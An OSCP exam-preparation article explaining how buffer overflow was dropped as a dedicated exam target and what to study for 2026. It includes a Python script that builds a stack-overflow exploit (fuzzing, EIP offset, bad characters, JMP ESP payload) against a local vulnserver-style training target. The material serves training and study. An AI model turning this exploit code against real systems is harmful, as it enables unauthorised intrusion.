Is buffer overflow still required for the OSCP exam in 2026?
No. There has been no dedicated buffer overflow machine since Offensive Security restructured the exam in January 2022, and the 2023 PEN-200 update then dropped the stand-alone buffer overflow module from the core course; neither change has been reversed in any syllabus update since, including the 2026 refresh. Buffer overflow theory remains in the PEN-200 materials and a stack-based overflow can still surface on one of the standalone targets, but you will not face a dedicated 25-point stack-smashing target as you did under the legacy exam structure.
For roughly a decade, the OSCP was synonymous with one specific 25-point machine: the buffer overflow. Candidates would rehearse the attack chain so many times that they could write a working exploit at 3 a.m. without coffee. Then in January 2022, Offensive Security retired the dedicated buffer overflow target, and the 2023 course update removed the module from the core syllabus. The reaction online was a mix of relief and grief. Several years on, candidates entering the 2026 exam window still ask whether the topic is dead. The honest answer is that the dedicated machine is gone, the theory is alive, and the practical skills involved are now distributed across the standalone targets instead of concentrated in a single set-piece. Anyone preparing for OSCP in 2026 should understand exactly what changed and what did not.
What Offensive Security actually removed
The pre-2022 exam delivered five machines: one buffer overflow worth 25 points, one standalone worth 25 points, two standalones worth 20 points each, and one worth 10 points; there was no Active Directory set. The buffer overflow was a Windows binary running on a known port, provided alongside a debugging VM, with a vulnerable function and a 32-bit stack you could trivially overflow with a generated cyclic pattern. The attack chain was so formulaic that Tib3rius's and The Cyber Mentor's walkthroughs reduced it to a 45-minute repeatable script.
In January 2022, Offensive Security restructured the exam, and the 2023 PEN-200 update then removed the dedicated module from the course. The current 2026 layout is:
- One Active Directory set worth 40 points covering one external entry host and two internal Active Directory hosts that must form a complete attack chain
- Three standalone target hosts worth 20 points each, totalling 60 points
- 10 optional bonus points awarded for completing 80% of the exercises in every PEN-200 module and rooting at least 30 of the lab machines from the official lab range. The eligibility rules for bonus points have changed more than once, so confirm the current terms in the OSCP Exam Guide before building a pass plan around them.
There is no longer a dedicated buffer overflow target. The standalone targets pull from web exploitation, Linux privilege escalation, kernel exploits, misconfigurations, and occasional binary exploitation. A candidate could in principle face a stack-based overflow on a standalone, but the modern PEN-200 syllabus deliberately de-emphasises it because the attack class no longer represents the bulk of real-world initial access.
"We removed the dedicated buffer overflow because it had become a memorisation drill rather than an offensive thinking drill. The OSCP should test whether you can compromise a system you have never seen, not whether you can repeat a 12-step recipe." -- Ning Wang, former CEO, Offensive Security
What the 2026 PEN-200 still teaches about buffer overflow
The PEN-200 course materials still walk through the classic stack-based chain end to end: identifying a vulnerable program, fuzzing for the crash length, locating the EIP offset with a cyclic pattern, finding bad characters, locating a JMP ESP gadget, generating shellcode with msfvenom, and delivering it through a Python proof-of-concept. There is also a smaller introduction to Linux buffer overflows using gdb and pwntools. Where that content sits has moved between course revisions (the 2023 update dropped the dedicated Windows Buffer Overflows module from the core course), so check the current syllabus for where your lab access puts it. What the syllabus no longer does is build the entire exam around that one chain.
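The chain above is easier to internalise as code than as a list of steps. The following is an added example written for this page, not PEN-200 or vulnserver code: it implements the offline parts of the chain (a fuzzing loop with pluggable transport, a Metasploit-style cyclic pattern and its offset lookup, a bad-character sweep, and payload assembly that refuses to ship a gadget address or shellcode containing a known bad byte). The host, port, `TRUN /.:/ ` prefix, offset 2003 and JMP ESP address in the `__main__` section are constructed illustration values; take yours from your own debugger session.

```python
"""
Helpers for the stack-overflow proof-of-concept chain: fuzz for the crash
length, locate the EIP offset with a cyclic pattern, sweep for bad characters,
and assemble the final payload. Added example, not PEN-200 or vulnserver code.
Host, port, prefix, offset and JMP ESP address in __main__ are constructed.
"""
import socket
import struct
from typing import Callable, Iterable, Optional, Union

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes, every 4-byte window unique


def fuzz(send: Callable[[bytes], bool], start: int = 100, step: int = 100,
         limit: int = 5000) -> Optional[int]:
    """Send growing buffers through `send`, which returns False once the service
    stops answering. Returns the first length that killed it, else None."""
    for n in range(start, limit + 1, step):
        if not send(b"A" * n):
            return n
    return None


def cyclic_pattern(length: int) -> bytes:
    """Same scheme as msf-pattern_create (Aa0Aa1...Aa9Ab0...): every 4-byte window
    is unique, so the bytes that land in EIP map back to exactly one offset."""
    if length > MAX_PATTERN:
        raise ValueError(f"pattern is only unique up to {MAX_PATTERN} bytes")
    out = bytearray()
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                out += (u + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip: Union[int, bytes], length: int = MAX_PATTERN) -> Optional[int]:
    """EIP as read from the debugger (int, e.g. 0x62413762) or as 4 raw stack bytes.
    An int is packed little-endian because that is how x86 stores the return address."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else eip
    idx = cyclic_pattern(length).find(needle)
    return idx if idx >= 0 else None


def badchar_sweep(exclude: Iterable[int] = (0x00,)) -> bytes:
    """Every byte 0x01..0xFF except those already known to be mangled. Send it after
    the offset, compare the stack dump byte by byte, add the first mismatch to
    `exclude`, and repeat until the dump matches what was sent."""
    excluded = set(exclude)
    return bytes(b for b in range(1, 256) if b not in excluded)


def build_payload(prefix: bytes, offset: int, jmp_esp: int, shellcode: bytes,
                  nop_sled: int = 16, badchars: Iterable[int] = (0x00,)) -> bytes:
    """Layout: prefix | filler to EIP | JMP ESP (little-endian) | NOP sled | shellcode.
    Refuses to build if the gadget address or shellcode contains a known bad byte,
    which is the usual reason a chain that 'should work' silently dies."""
    bad = set(badchars)
    ret = struct.pack("<I", jmp_esp)
    for name, blob in (("JMP ESP address", ret), ("shellcode", shellcode)):
        hit = sorted(bad & set(blob))
        if hit:
            raise ValueError(f"{name} contains bad characters: {[hex(b) for b in hit]}")
    return prefix + b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def send_once(host: str, port: int, data: bytes, timeout: float = 3.0) -> bool:
    """Deliver one buffer over TCP; False means the service no longer accepts or answers."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                 # banner
            s.sendall(data + b"\r\n")
            s.recv(1024)                 # a live service answers; a crashed one does not
        return True
    except OSError:
        return False


if __name__ == "__main__":
    # Constructed values for a vulnserver-style target on a local VM; replace with your own.
    HOST, PORT, PREFIX = "127.0.0.1", 9999, b"TRUN /.:/ "
    print("service died at", fuzz(lambda buf: send_once(HOST, PORT, PREFIX + buf)))
    # After the crash, read EIP from the debugger and resolve the offset:
    print("offset:", pattern_offset(0x62413762))          # -> 52 for this constructed EIP
    # Sweep bad chars, pick a JMP ESP address free of them, generate shellcode with
    # msfvenom -b for the same bad-char set, then build and send:
    payload = build_payload(PREFIX, 2003, 0x625011AF, b"\xcc" * 4)
    print("payload length:", len(payload))
```

Two design points worth noting: `fuzz` takes the transport as a callable so the loop can be rehearsed against a fake target before touching the lab network, and `build_payload` validates bad characters in the gadget address as well as the shellcode, since a return address containing `0x00` or `0x0a` is a common and hard-to-spot reason the exploit never reaches the NOP sled.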
Buffer overflow -- a memory-safety vulnerability where a program writes data beyond the bounds of an allocated buffer, corrupting adjacent memory and allowing an attacker to redirect execution flow to attacker-controlled code. The classic stack-based variant overwrites the saved return pointer; heap variants and Structured Exception Handler (SEH) overflows behave differently and require different exploitation primitives.
Return-Oriented Programming (ROP) -- an exploitation technique that chains together short instruction sequences ending in ret to bypass non-executable stack protections like DEP. ROP is referenced in the PEN-200 reading list but is not assessed; OSCE3 covers it in depth.
The relevant chapters of the PWK (Penetration Testing with Kali Linux) book still appear in the lab access materials, and Offensive Security continues to offer EXP-301 (Windows User Mode Exploit Development), the course behind the harder OSED certification, as the bridge for anyone who wants to go further. Candidates who want to retain buffer-overflow muscle memory should work through the vulnserver application and the TryHackMe Buffer Overflow Prep room as supplementary practice; both follow the same chain the PEN-200 chapter teaches.
Why some standalones still feel like buffer overflow problems
Even though the dedicated machine is gone, four categories of standalone target produce a similar feel.
| Target type | Skill overlap with buffer overflow |
|---|---|
| Custom binary on an unusual port | Fuzzing, crash analysis, bad-character identification |
| Format string bug in a web service | Memory layout reasoning, controlled-write primitives |
| Kernel privilege escalation via a known CVE | Shellcode delivery, payload size constraints |
| SUID binary with a vulnerable input parser | Stack reasoning, environment variable abuse |
A candidate who walked away from binary exploitation entirely after the 2023 change is taking a real risk. The standalone box that breaks the typical web-then-priv-esc rhythm is increasingly likely to be a binary, and recognising the shape of the problem fast matters when 24 hours of exam time is on the clock.
The role of the bonus points
The 10 bonus points are the difference between a comfortable pass and a nail-biter. The combined lab and exercise requirements can be completed before the exam window, and Offensive Security verifies the submission. Skipping bonus points to save time is a false economy. Both 0xdf and Ippsec, two of the most-watched walkthrough creators on YouTube, have repeatedly emphasised that bonus points have saved more passing exams than any single technique.
A realistic 12-week prep plan for 2026
The plan below assumes 15 to 20 hours per week and access to the official PEN-200 lab plus a HackTheBox VIP subscription.
- Weeks 1 and 2. Read PEN-200 chapters 1 to 6 once. Do every exercise. Set up Kali with note-taking infrastructure, ideally Obsidian with the Templater plugin or CherryTree. Reproduce the chapter 7 buffer overflow against `vulnserver` on a local Windows VM at least three times.
- Weeks 3 and 4. Web exploitation deep dive. Cover SQL injection, file upload bypasses, server-side template injection, and SSRF. Use HackTheBox's Web Fundamentals path and PortSwigger's Web Security Academy labs.
- Weeks 5 and 6. Linux privilege escalation. Read g0tm1lk's legendary blog post end to end. Run `linpeas` on every machine you touch. Practice kernel exploits, `SUID` abuse, `sudo` misconfigurations, cron job hijacking, and PATH abuse on at least 15 different lab machines.
- Weeks 7 and 8. Windows privilege escalation. Read FuzzySecurity's Windows privilege escalation reference. Practice token impersonation, `JuicyPotato`, `PrintSpoofer`, unquoted service paths, and DLL hijacking. Include at least three machines that require reading the AlwaysInstallElevated registry keys.
- Weeks 9 and 10. Active Directory chain. The 40-point set is the single largest scoring opportunity on the exam. Practice Kerberoasting, AS-REP roasting, NTLM relay, DCSync, and lateral movement with `evil-winrm` and `psexec`. Build at least two AD labs from scratch using GOAD (Game of Active Directory) so you understand the trust topology.
- Weeks 11 and 12. Full exam simulations. Block out 24-hour windows. Take a Proving Grounds Practice exam ticket. Write the report under exam conditions in Markdown with screenshots. Submit a draft to a peer for review.
What to do the week before the exam
- Sleep eight hours per night. Stimulants do not substitute for cognition.
- Pre-stage your `report.md` template with the Offensive Security required headings.
- Pre-load your toolbox: `nmap`, `ffuf`, `gobuster`, `evil-winrm`, `BloodHound`, `Rubeus`, `PowerView`, `linpeas`, `winpeas`, `pwncat-cs`, and a working Burp Suite configuration.
- Test your VPN configuration the day before the exam. The most common day-of failure is a misconfigured `openvpn` profile.
The night before the exam, do not study. Reread your own notes for one hour and stop. The spacing effect documented since Hermann Ebbinghaus's 1885 memory experiments favours review distributed over weeks rather than crammed into the final night, and sleep consolidates retrieval-ready memory more effectively than late-night re-reading.
Real candidate outcomes after the 2023 change
A penetration consultant, Felipe, took the exam under the legacy format in 2022 and failed at 60 points because his buffer overflow exploit produced a non-interactive shell that died after every command. He retook in late 2023 under the new format and passed at 80 points by getting the full Active Directory chain and two standalones, with the third standalone abandoned after six hours.
A SOC analyst, Ada, failed her first attempt in 2024 with 60 points because she budgeted four hours for an Active Directory chain that took twelve. Her second attempt the following year scored 90 points because she had practised the full GOAD lab end to end and recognised the child-domain to forest-root escalation path within an hour.
The Equifax breach of 2017, while not directly relevant to OSCP exam content, is referenced in the PEN-200 reading material as a case study in how an unpatched Apache Struts remote code execution vulnerability translates into the same initial-access primitive a candidate must demonstrate on the exam. The SolarWinds compromise of 2020 is cited similarly for its lessons about persistence and credential reuse, which map onto the lateral-movement portion of the AD chain.
"The shift away from the buffer overflow machine forced candidates to become better penetration testers. The cert is now harder to brute-force and easier to genuinely earn. That is exactly what we wanted." -- Heath Adams, founder, TCM Security and OSCP holder
Should you still learn buffer overflow theory in 2026?
Yes, but for the right reasons. Three arguments stand on their own.
- Career signalling. Hiring managers for red-team and exploit-development roles explicitly look for binary-exploitation literacy. The OSCE3 path, especially the OSED component, depends on it. If your career trajectory points toward exploit development at firms like CrowdStrike, Palo Alto Networks, or boutique offensive consultancies, skip nothing.
- Defensive depth. Detection engineers and threat hunters who understand exploitation primitives write better detections. The 2023 3CX supply-chain attack and the 2024 XZ Utils backdoor were both supply-chain compromises rather than memory-corruption bugs, but reasoning about their payloads (the XZ backdoor hid its hook inside liblzma's build and dynamic-linking machinery) demands exactly the binary-level literacy that buffer-overflow study builds.
- Exam insurance. A standalone target with a binary component is uncommon but not impossible. Candidates who can recognise a fuzzable service in 15 minutes have a meaningful edge over candidates who cannot.
What you can safely skip in 2026 is exhaustive memorisation of the legacy 12-step chain. Understand the concepts, run vulnserver twice, and move on.
Tooling that matters more than buffer overflow drills
The 2026 exam rewards fluency with a small set of tools used aggressively rather than encyclopaedic knowledge of every technique. Candidates who pass consistently report that they over-invested in three tools and under-invested in everything else.
- BloodHound and SharpHound. The Active Directory chain almost always contains an exploitable graph relationship. Running `SharpHound.exe -c All` early and importing into BloodHound surfaces shortest paths to Domain Admin within minutes. Without it, the chain feels arbitrary; with it, the chain feels obvious.
- Burp Suite Professional. The standalone web targets consistently require parameter tampering, session manipulation, or chained injection vulnerabilities. Burp's Repeater and Intruder save hours compared to manual `curl` invocations.
- CrackMapExec or NetExec. The successor `nxc` tool replaced `crackmapexec` in 2024 and now ships in Kali by default. It is the single fastest way to enumerate SMB, WinRM, MSSQL, and LDAP services across an internal subnet, and it integrates cleanly with BloodHound output.
These three tools together cover the vast majority of attack surface a 2026 exam target will present. A candidate who has burned 100 hours into mastering them is in a stronger position than one who has burned 100 hours rehearsing legacy stack-smashing chains.
Note-taking discipline as a force multiplier
The exam report is graded as carefully as the exploitation work. Offensive Security requires reproducible step-by-step documentation including command outputs, proof-of-concept code, and screenshots showing both the proof.txt content and the running session that obtained it. The proof screenshot must show the flag contents together with the target's IP address (`ipconfig` or `ip a`) in the same shell; a screenshot of the flag alone does not satisfy the exam guide. A candidate who passes the technical bar but submits a sloppy report can still fail. Build a template before the exam with the following structure: Executive Summary, High-Level Findings, per-machine Walkthrough, per-finding Risk Rating, and Appendix with raw command output. The SysReptor open-source reporting tool now integrates with the OSCP submission format and is increasingly the community standard.
Common preparation mistakes worth avoiding
Three categories of mistake show up in failure post-mortems on the /r/oscp subreddit and on the OffSec Discord.
- Over-indexing on HackTheBox seasons. HTB content is excellent, but the box style and difficulty curve do not always match the OSCP exam style. Spend at least half your lab time inside the official PEN-200 lab and Proving Grounds Practice rather than purely on HTB.
- Skipping Active Directory drills. Candidates who have never built an AD lab from scratch routinely fail the 40-point chain. The fix is GOAD (Game of Active Directory) or Hack The Box's Dante or Cybernetics pro labs, all of which mirror the AD topology of the exam.
- Treating the exam as an endurance test. The 24-hour clock is generous, but humans degrade after 16 hours of focused work. Plan for a four-hour sleep block after the first 12 hours rather than pulling a true all-nighter. Candidates who slept performed better in self-reported surveys conducted by TJnull's OSCP exam preparation community.
A final structural truth: the 2026 OSCP rewards the same thing it has always rewarded, which is the ability to enumerate exhaustively, recognise the shape of a vulnerability, and turn that recognition into a working exploit on a system you have never seen. The disappearance of the dedicated buffer overflow machine did not change the fundamental skill being tested. It changed the surface area. Candidates who internalise that distinction prepare more effectively than candidates who treat the change as either a relief or a setback.
See also: OSCP exam strategy: 24-hour lab, How to study for OSCP with limited lab time, Active Directory attacks for cybersecurity cert exams, Burp Suite mastery for OSCP.
References
- Offensive Security. PEN-200: Penetration Testing with Kali Linux Course Syllabus. Offensive Security, 2024.
- Offensive Security. OSCP Exam Guide and Frequently Asked Questions. Offensive Security, 2024.
- NIST Special Publication 800-115. Technical Guide to Information Security Testing and Assessment. National Institute of Standards and Technology, 2008.
- MITRE ATT&CK Framework. T1055 Process Injection and T1574 Hijack Execution Flow. MITRE Corporation, 2024.
- Erickson, Jon. Hacking: The Art of Exploitation, 2nd Edition. No Starch Press, 2008.
- Anley, Chris et al. The Shellcoder's Handbook, 2nd Edition. Wiley, 2007.
